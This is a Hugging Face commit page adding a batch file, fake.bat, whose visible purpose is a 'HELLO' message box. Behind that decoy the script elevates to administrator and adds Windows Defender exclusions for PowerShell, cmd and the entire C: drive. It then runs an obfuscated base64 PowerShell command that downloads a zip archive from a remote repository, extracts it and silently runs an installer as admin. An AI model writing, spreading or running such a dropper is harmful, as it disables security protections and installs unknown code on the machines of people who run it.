Juronuim commited on
Commit
67d2901
·
verified ·
1 Parent(s): 0663ad4

Upload fake.bat

Browse files
Files changed (1) hide show
  1. fake.bat +27 -0
fake.bat ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ @echo off
2
+ :: 1. Запрос прав администратора
3
+ :: Проверяем, запущен ли скрипт от имени администратора
4
+ net session >nul 2>&1
5
+ if %errorLevel% == 0 (
6
+ echo Running as admin.
7
+ ) else (
8
+ echo Requesting admin privileges...
9
+ :: Запуск скрипта от имени администратора
10
+ powershell -Command "Start-Process '%~f0' -Verb RunAs"
11
+ exit /b
12
+ )
13
+
14
+ :: 2. Вывод окна "HELLO"
15
+ :: Используем PowerShell для отображения окна с сообщением
16
+ powershell -Command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('HELLO', 'Message')"
17
+
18
+ PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionProcess powershell.exe, cmd.exe\"' -Verb RunAs -WindowStyle Hidden}"
19
+ timeout 5
20
+ PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:" ' -Verb RunAs -WindowStyle Hidden}"
21
+
22
+ :: 3. Скрыть консоль и продолжить выполнение в фоновом режиме
23
+ :: Запускаем PowerShell в фоновом режиме для выполнения дальнейших действий
24
+ powershell -Command "Start-Process powershell -ArgumentList '-NoProfile -WindowStyle Hidden -EncodedCommand "JAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7AAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByACAAPQAgACIAQwA6AFwAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAbgBhAG0AZQBcAHYAbwByAG0AaQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIgA7AAoAIAAgACAAIAAkAHoAaQBwAF8AZgBpAGwAZQAgAD0AIAAiACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAXAB2AG8AcgBtAC4AegBpAHAAIgA7AAoAIAAgACAAIAAkAGQAbwB3AG4AbABvAGEAZABfAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAGgAdQBnAGcAaQBuAGcAZgBhAGMAZQAuAGMAbwAvAEoAdQByAG8AbgB1AGkAbQAvAHQAZQBzAHQAdgB2AG8AcgBtAC8AcgBlAHMAbwBsAHYAZQAvAG0AYQBpAG4ALwB2AG8AcgBtAC4AegBpAHAAPwBkAG8AdwBuAGwAbwBhAGQAPQB0AHIAdQBlACIAOwAKAAoAIAAgACAAIAAjACAAIQQ+BDcENAQwBD0EOAQ1BCAAPwQwBD8EOgQ4BCwAIAA1BEEEOwQ4BCAAPgQ9BDAEIAA9BDUEIABBBEMESQQ1BEEEQgQyBEMENQRCBAoAIAAgACAAIABpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAKQApACAAewAKACAAIAAgACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AXwBmAG8AbABkAGUAcgAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAjACAAIQQ6BDAERwQ4BDIEMAQ9BDgENQQgAEQEMAQ5BDsEMAQKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAZABvAHcAbgBsAG8AYQBkAF8AdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHoAaQBwAF8AZgBpAGwAZQA7AAoACgAgACAAIAAgACMAIAAgBDAEQQQ/BDAEOgQ+BDIEOgQwBCAAMARABEUEOAQyBDAECgAgACAAIAAgAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACQAegBpAHAAXwBmAGkAbABlACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQA7AAoACgAgACAAIAAgACMAIAAXBDAEPwRDBEEEOgQgAGkAbgBzAHQAYQBsAGwAZQByAC4AYgBhAHQAIAA+BEIEIAA4BDwENQQ9BDgEIAAwBDQEPAQ4BD0EOARBBEIEQAQwBEIEPgRABDAEIAAyBCAARAQ+BD0EPgQyBD4EPAQgAEAENQQ2BDgEPAQ1BAoAIAAgACAAIAAkAGkAbgBzAHQAYQBsAGwAZQByAF8AcABhAHQAaAAgAD0AIAAiACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAXABpAG4AcwB0AGEAbABsAGUAcgAuAGIAYQB0ACIAOwAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAaQBuAHMAdABhAGwAbABlAHIAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAaQBuAHMAdABhAGwAbABlAHIAXwBwAGEAdABoACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIASQBuAHMAdABhAGwAbABlAHIALgBiAGEAdAAgAG4AbwB0ACAAZgBvAHUAbgBkACAAaQBuACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AXwBmAG8AbABkAGUAcgAiADsACgAgACAAIAAgAH0ACgA="'
25
+
26
+ :: Завершение основного скрипта
27
+ exit